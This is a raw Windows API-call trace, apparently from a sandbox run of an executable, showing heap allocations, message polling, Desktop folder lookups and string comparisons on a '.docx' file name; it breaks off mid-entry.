[0160.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0160.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3b50 [0160.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6qT95vcU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qT95vcU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T95vcU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="95vcU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5vcU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vcU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cU.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0160.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0160.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0160.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0160.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0160.810] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0160.810] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0160.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0160.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0160.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0160.811] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0160.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0160.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.812] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0160.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0160.814] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0160.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0160.815] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0160.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0160.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0160.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0160.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0160.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0160.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0160.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0160.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0160.818] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0160.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.818] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.819] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.819] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0160.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0160.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0160.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0160.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.820] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0160.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0160.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.822] HeapFree 